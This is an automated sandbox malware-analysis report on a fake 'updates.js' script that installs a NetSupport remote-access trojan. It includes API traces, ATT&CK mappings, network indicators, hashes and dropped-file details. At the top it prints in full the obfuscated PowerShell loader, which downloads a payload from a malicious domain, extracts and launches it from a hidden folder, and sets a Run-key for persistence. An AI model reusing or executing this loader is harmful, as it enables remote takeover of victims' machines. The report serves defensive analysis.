                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -ex bypass -nop -c $hgwcfvipunw='http://dfwreds.com/data.php?14991';$azewtjmsl=(new-object system.net.webclient).downloadstring($hgwcfvipunw);$qepgekusqfv=[system.convert]::frombase64string($azewtjmsl);$asd = get-random -minimum -10 -maximum 37; $liedxzvhuh=[system.environment]::getfolderpath('applicationdata')+'\grdcwlli'+$asd;if (!(test-path $liedxzvhuh -pathtype container)) { new-item -path $liedxzvhuh -itemtype directory };$p=join-path $liedxzvhuh 'tttt.zip';[system.io.file]::writeallbytes($p,$qepgekusqfv);try { add-type -a system.io.compression.filesystem;[system.io.compression.zipfile]::extracttodirectory($p,$liedxzvhuh)} catch { write-host 'failed: ' + $_; exit};$cv=join-path $liedxzvhuh 'client32.exe';if (test-path $cv -pathtype leaf) { start-process -filepath $cv} else {write-host 'no exe.'};$fd=get-item $liedxzvhuh -force; $fd.attributes='hidden';$s=$liedxzvhuh+'\client32.exe';$k='hkcu:\software\microsoft\windows\currentversion\run';$v='hqwqto';$ds='string';new-itemproperty -path $k -name $v -value $s -propertytype $ds;
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1109E5B0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,3_2_1109E5B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1109ED30 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,3_2_1109ED30
                                Source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Progman
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_11174898
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoA,3_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_11174796
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,7_2_11174BCC
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoA,7_2_1116C24E
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,7_2_11174796
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_111746A1
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,7_2_1117483D
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,7_2_11174898
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11174B29
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,7_2_11174B90
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,7_2_11174A69
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,3_2_110F37A0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,3_2_11134830
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1103BA70 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,3_2_1103BA70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_1117594C
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11145C70 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,3_2_11145C70
                                Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,3_2_11070430
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,7_2_11070430
                                Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7424, type: MEMORYSTR
                                Source: Yara match, File source: Process Memory Space: client32.exe PID: 7968, type: MEMORYSTR
                                Source: Yara match, File source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, type: DROPPED
                                Source: Yara match, File source: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll, type: DROPPED
                                Source: Yara match, File source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL, type: DROPPED
                                Source: Yara match, File source: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL, type: DROPPED
                                Source: Yara match, File source: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL, type: DROPPED
                                Source: Yara match, File source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, type: DROPPED
                                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                                Resource Development: 12 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                                Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                                Execution: 1 Windows Management Instrumentation; 4 Native API; 1 Exploitation for Client Execution; 1 Command and Scripting Interpreter; 2 Service Execution; 3 PowerShell; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                                Persistence: 12 Scripting; 1 DLL Side-Loading; 2 Valid Accounts; 1 Windows Service; 1 Registry Run Keys / Startup Folder; RC Scripts; Startup Items; Scheduled Task/Job; At
                                Privilege Escalation: 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 1 Windows Service; 13 Process Injection; 1 Registry Run Keys / Startup Folder; Startup Items; Scheduled Task/Job; At
                                Defense Evasion: 1 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 11 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 2 Valid Accounts; 31 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 13 Process Injection
                                Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                                Discovery: 2 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 34 System Information Discovery; 141 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 1 System Owner/User Discovery
                                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                                Collection: 1 Archive Collected Data; 1 Screen Capture; 1 Input Capture; 3 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                                Command and Control: 1 Ingress Tool Transfer; 22 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                                Impact: 1 System Shutdown/Reboot; 1 Defacement; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                                Behavior Graph ID: 1474469, Sample: updates.js, Startdate: 16/07/2024, Architecture: WINDOWS, Score: 100
                                Sample: DNS/IP: dfwreds.com; geo.netsupportsoftware.com. Signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures. Started: wscript.exe; client32.exe; client32.exe.
                                wscript.exe: Signatures: Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found. Started: powershell.exe.
                                powershell.exe: DNS/IP: dfwreds.com 23.227.193.59, 49730, 80 HVC-ASUS United States. Dropped: C:\Users\user\AppData\...\remcmdstub.exe, PE32; C:\Users\user\AppData\Roaming\...\pcicapi.dll, PE32; C:\Users\user\AppData\...\client32.exe, PE32; 6 other files (5 malicious). Signatures: Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file. Started: client32.exe; conhost.exe.
                                client32.exe: DNS/IP: 94.158.245.103, 443, 49731 MIVOCLOUDMD Moldova Republic of; geo.netsupportsoftware.com 104.26.0.231, 49732, 80 CLOUDFLARENETUS United States. Signatures: Multi AV Scanner detection for dropped file; Contains functionalty to change the wallpaper; Delayed program exit found.

                                No Antivirus matches
                                Source | Detection | Scanner | Label | Link
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL | 13% | ReversingLabs | Win32.Trojan.Generic |
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL | 5% | ReversingLabs | |
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL | 6% | ReversingLabs | |
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL | 6% | ReversingLabs | |
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe | 26% | ReversingLabs | Win32.Trojan.NetSupport |
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dll | 0% | ReversingLabs | |
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll | 3% | ReversingLabs | |
                                C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exe | 24% | ReversingLabs | Win32.Trojan.Generic |
                                No Antivirus matches
                                No Antivirus matches
                                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                                geo.netsupportsoftware.com | 104.26.0.231 | true | false | | unknown
                                dfwreds.com | 23.227.193.59 | true | true | | unknown
                                Name | Malicious | Antivirus Detection | Reputation
                                http://geo.netsupportsoftware.com/location/loca.asp | false | Avira URL Cloud: safe | unknown
                                http://94.158.245.103/fakeurl.htm | false | Avira URL Cloud: safe | unknown
                                http://dfwreds.com/data.php?14991 | true | Avira URL Cloud: malware | unknown
                                    http://0.30000000000000004.com/wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://127.0.0.1client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.symauth.com/cps0(powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://momentjs.com/wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1816720389.00000170BC0D0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://yandex.com/safety/?frombrowser=yes&url=$1powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalsCompositeOperationwscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.symauth.com/rpa00powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://yandex.com/safety/?frombrowser=yes&url=$3powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://yandex.com/safety/?frombrowser=yes&url=$2powershell.exe, 00000001.00000002.1816720389.00000170BB04E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/variableCompositeOperationwscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://github.com/ecomfe/zrender/blob/master/LICENSE.txtwscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://oneget.orgpowershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    https://yandex.com/support/browser/security/protection.htmlpowershell.exe, 00000001.00000002.1816720389.00000170BB0F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IP | Domain | Country | ASN | ASN Name | Malicious
                                    94.158.245.103 | unknown | Moldova Republic of | 39798 | MIVOCLOUDMD | false
                                    23.227.193.59 | dfwreds.com | United States | 29802 | HVC-ASUS | true
                                    104.26.0.231 | geo.netsupportsoftware.com | United States | 13335 | CLOUDFLARENETUS | false
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1474469
                                    Start date and time:2024-07-16 22:28:51 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 9m 42s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:10
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:updates.js
                                    Detection:MAL
                                    Classification:mal100.rans.troj.expl.evad.winJS@8/28@3/3
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 74%
                                    • Number of executed functions: 134
                                    • Number of non-executed functions: 234
                                    Cookbook Comments:
                                    • Found application associated with file extension: .js
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7424 because it is empty
                                    • Not all processes were analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: updates.js
                                    Time | Type | Description
                                    16:29:46 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                                    16:30:24 | API Interceptor | 5910610x Sleep call for process: client32.exe modified
                                    21:29:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run HQWQTO C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                    21:30:05 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run HQWQTO C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            Process:C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:modified
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.077819531114783
                                                                            Encrypted:false
                                                                            SSDEEP:3:llD:b
                                                                            MD5:C40449C13038365A3E45AB4D7F3C2F3E
                                                                            SHA1:CB0FC03A15D4DBCE7BA0A8C0A809D70F0BE6EB9B
                                                                            SHA-256:1A6B256A325EEE54C2A97F82263A35A9EC9BA4AF5D85CC03E791471FC3348073
                                                                            SHA-512:3F203E94B7668695F1B7A82BE01F43D082A8A5EB030FC296E0743027C78EAB96774AB8D3732AFE45A655585688FB9B60ED355AEE4A51A2379C545D9440DC974C
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:40.7357,-74.1724
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):1524
                                                                            Entropy (8bit):5.3904027322805375
                                                                            Encrypted:false
                                                                            SSDEEP:24:31Nn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNmwr8HJYBlD3RB+j:FNn4SU4y4RQmFoUeCamfm9qr9tK8Nfm3
                                                                            MD5:652454284F90BD3744B5DC8A572B5080
                                                                            SHA1:AC04F05E3935F1F95EB90EE1D54A6B4BD27EDCDC
                                                                            SHA-256:12BD82D57AF13593F725DB195F03331C5667C1280EAF76DC1642E20C53AD260E
                                                                            SHA-512:98656D2368850A9F4B690D69FFACF412B0D38AFFEDF9DC25CECF653BDE2232725F5276FF340CD0C9AD95EE349776A2E86FE5C4EB4F70EC651718B7CBC9761E35
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:@...e...........8.....................&..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):328056
                                                                            Entropy (8bit):6.7547459359511395
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
